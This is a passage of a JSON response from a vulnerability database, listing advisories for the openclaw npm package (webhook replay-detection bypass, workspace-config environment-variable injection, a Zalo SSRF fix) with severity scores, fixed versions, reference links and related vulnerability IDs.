3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A
V:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41351","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41351"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:
Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding"},{"reference_url":"https://github.com/advisories/GHSA-37v6-fxx8-xjmx","reference_id":"GHSA-37v6-fxx8-xjmx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-37v6-fxx8-xjmx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID
-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID
-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41351","GHSA-37v6-fxx8-xjmx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jdqk-kv8u-xqa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89392?format=json","vulnerability_id":"VCID-jhah-j2td-t3dp","summary":"OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n## Summary\nIncomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.23-2`\n- Patched versions: `>= 2026.3.24`\n- First stable tag containing the fix: `v2026.3.24`\n\n## Fix Commit(s)\n- `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.24`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @YLChen-007 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41384","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41384"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","s
coring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41384","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41384"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in
-cli-backend"},{"reference_url":"https://github.com/advisories/GHSA-vfw7-6rhc-6xxg","reference_id":"GHSA-vfw7-6rhc-6xxg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfw7-6rhc-6xxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"
VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"
VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"
VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"
VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-41384","GHSA-vfw7-6rhc-6xxg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jhah-j2td-t3dp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93303?format=json","vulnerability_id":"VCID-jshg-1pb2-wbak","summary":"OpenClaw validates Zalo outbound photo URLs through the SSRF guard\n## Summary\nZalo outbound photo URLs are validated through the SSRF guard.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy.\n\n## Fix\nZalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers.\n\n## Fix Commit(s)\n- a65eb1b864b7630c1242a82de9e5799b80583c3f\n\n## Verification\n- The fix commit is contained in 
the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @foodlook for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44116","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13839","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13842","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.1519","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44116"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f","reference_id":"","reference_type"